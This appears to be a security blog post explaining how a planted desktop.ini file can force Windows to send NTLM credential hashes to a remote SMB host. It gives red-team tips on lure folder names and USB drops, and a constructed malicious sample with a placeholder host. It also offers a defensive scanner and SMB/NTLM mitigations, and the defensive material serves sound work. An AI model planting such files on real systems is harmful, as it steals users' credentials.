One of the Canary triggers works by taking advantage of the way Microsoft Windows presents folders to its users: it checks for a hidden desktop.ini file that points the OS to the folder's view preferences.
Canary works by directing those preferences to a remote server (that is listening for incoming requests); when that request comes in, we know the folder has been entered! Very sneaky! (I didn't know about this technique until I was exploring the payloads available on canarytokens.org.)
So I figured, if we point it to a remote location with SMB authentication on it, we know that Windows will automatically send its current user's credentials to that location, and I'll get hashes!
It works! So, if you are ever on a Red Team and you have access to a shared folder, plant one in there (you will need to make the share read-only for the desktop.ini to persist) with a name like PeopleGettingSacked or Movies or CEO Holiday Pics ... whatever, you know better than me...
Additionally, if you put the desktop.ini flat on a USB stick, as soon as the pen is mounted (unless auto-run is disabled) it will open up the folder automatically (actioning the attack).
I bet this is already being used out there! ... Very sneaky/powerful, I had to share ... In fact I can't help thinking this might be a very well known thing and I'm out of the loop -_-
I think there is some caching of the desktop.ini too (at least with Windows 10), as when I ejected my evil USB I could still see incoming requests from my machine. Will follow up on that.
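From the defender's side, the thing to hunt for is a desktop.ini whose entries point at a remote location rather than a local file. The following is an added example, not code from the original post or from Canary: a small scanner that walks a share or removable drive, parses every desktop.ini it finds, and reports any value that begins with a UNC path or URL. The host name in the constructed sample is a placeholder.

```python
import configparser
import os
import re
import tempfile

# Constructed sample of the kind of desktop.ini this post describes: the only
# remote reference is a placeholder host, not a real server.
PLANTED_DESKTOP_INI = """[.ShellClassInfo]
IconResource=\\\\EXAMPLE-REMOTE-HOST\\share\\folder.ico,0
"""
# Constructed benign sample: a customised folder icon served from a local DLL.
BENIGN_DESKTOP_INI = """[.ShellClassInfo]
IconResource=%SystemRoot%\\system32\\SHELL32.dll,3
"""

# A value is suspicious if it starts with a UNC path (\\host\...) or a URL.
REMOTE_REF = re.compile(r"^\s*(\\\\[^\\]+\\|https?://|ftp://)", re.IGNORECASE)


def scan_desktop_ini(path):
    """Return (section, key, value) tuples whose value references a remote host."""
    parser = configparser.ConfigParser(interpolation=None, strict=False,
                                       allow_no_value=True)
    parser.optionxform = str  # keep key names exactly as written in the file
    with open(path, encoding="utf-8-sig", errors="replace") as fh:
        parser.read_file(fh)
    return [(section, key, value.strip())
            for section in parser.sections()
            for key, value in parser.items(section)
            if value and REMOTE_REF.match(value)]


def scan_tree(root):
    """Map each desktop.ini under root that points off-host to its findings."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower() == "desktop.ini":
                full = os.path.join(dirpath, name)
                findings = scan_desktop_ini(full)
                if findings:
                    hits[full] = findings
    return hits


def build_demo_tree():
    """Create a temp 'share' with one planted and one benign desktop.ini."""
    root = tempfile.mkdtemp(prefix="ini-scan-")
    for folder, body in (("Movies", PLANTED_DESKTOP_INI), ("Local", BENIGN_DESKTOP_INI)):
        os.makedirs(os.path.join(root, folder))
        with open(os.path.join(root, folder, "desktop.ini"), "w", encoding="utf-8") as fh:
            fh.write(body)
    return root
```

On a real share, run scan_tree against the share root; pair the check with blocking outbound SMB (TCP 445) at the perimeter and the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy so that a hit cannot leak credentials in the first place.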
An in-depth look into the options when writing a desktop.ini file, possibly more opportunities for trouble? https://hwiegman.home.xs4all.nl/desktopini.html
Attacker & user view: https://www.youtube.com/watch?v=t8zqJm5d8gg